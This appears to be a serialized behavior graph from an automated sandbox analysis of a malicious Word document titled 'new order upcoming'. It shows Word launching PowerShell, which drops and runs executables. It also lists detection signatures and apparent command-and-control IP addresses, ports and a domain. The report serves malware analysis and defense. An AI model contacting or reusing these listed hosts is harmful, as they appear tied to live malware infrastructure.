behavior_graph main Behavior Graph ID: 33605 Sample:  new order upcoming.... Startdate:  06/10/2017 Architecture:  WINDOWS Score:  100 1reduced Processes exeeded maximum capacity for this level. 2 processes have been hidden. main->1reduced      started     1 WINWORD.EXE 55 24 main->1      started     6 wlangdi.exe main->6      started     10 wlangdi.exe main->10      started     1841reducedSig Signatures exceeded maximum capacity for this level. 2 signatures have been hidden. 3866reducedSig Signatures exceeded maximum capacity for this level. 6 signatures have been hidden. 38610reducedSig Signatures exceeded maximum capacity for this level. 6 signatures have been hidden. 1841sig Document exploit detected (process start blacklist hit) 3866sig Drops executables to the windows directory (C:\Windows) and starts them 38610sig Drops executables to the windows directory (C:\Windows) and starts them 3867reducedSig Signatures exceeded maximum capacity for this level. 6 signatures have been hidden. 38611reducedSig Signatures exceeded maximum capacity for this level. 6 signatures have been hidden. 6062sig System process connects to network (likely due to code injection or exploit) 3867sig Drops executables to the windows directory (C:\Windows) and starts them 283d1e520741sig Uses known network protocols on non-standard ports 38611sig Drops executables to the windows directory (C:\Windows) and starts them 522d1e520739sig Detected TCP or UDP traffic on non-standard ports 522d1e520742sig Detected TCP or UDP traffic on non-standard ports 38612reducedSig Signatures exceeded maximum capacity for this level. 6 signatures have been hidden. 38613reducedSig Signatures exceeded maximum capacity for this level. 6 signatures have been hidden. 38614reducedSig Signatures exceeded maximum capacity for this level. 6 signatures have been hidden. 8994sig Found evasive API chain (may stop execution after checking mutex) 3868sig Drops executables to the windows directory (C:\Windows) and starts them 38612sig Drops executables to the windows directory (C:\Windows) and starts them 38613sig Drops executables to the windows directory (C:\Windows) and starts them 38614sig Drops executables to the windows directory (C:\Windows) and starts them 8995sig Found evasive API chain (may stop execution after checking mutex) 3869sig Drops executables to the windows directory (C:\Windows) and starts them 8999sig Found evasive API chain (may stop execution after checking mutex) d1e520738reduced Connected ips exeeded maximum capacity for this level. 1 connected ip has been hidden. d1e520741 147.135.209.118, 443 OVHFR France d1e520741->283d1e520741sig d1e520739 198.1.78.129, 8080 UNIFIEDLAYER-AS-1-UnifiedLayerUS United States d1e520739->522d1e520739sig d1e520742 46.4.67.203, 7080 HETZNER-ASDE Germany d1e520742->522d1e520742sig d1e520738 marley.net 69.195.124.165, 80 UNIFIEDLAYER-AS-1-UnifiedLayerUS United States d1e184358 39530.exe, PE32 1->1841reducedSig 1->1841sig 2 powershell.exe 12 7 1->2      started     6->3866reducedSig 6->3866sig 7 wlangdi.exe 2 10 6->7      started     10->38610reducedSig 10->38610sig 11 wlangdi.exe 10->11      started     2->6062sig 2->d1e520738reduced 2->d1e520738 2->d1e184358 dropped 4 39530.exe 2->4      started     7->3867reducedSig 7->3867sig 7->d1e520741 8 QYIyP.exe 3 2 7->8      started     11->38611reducedSig 11->38611sig 11->d1e520739 11->d1e520742 12 wlangdi.exe 11->12      started     13 wlangdi.exe 11->13      started     14 wlangdi.exe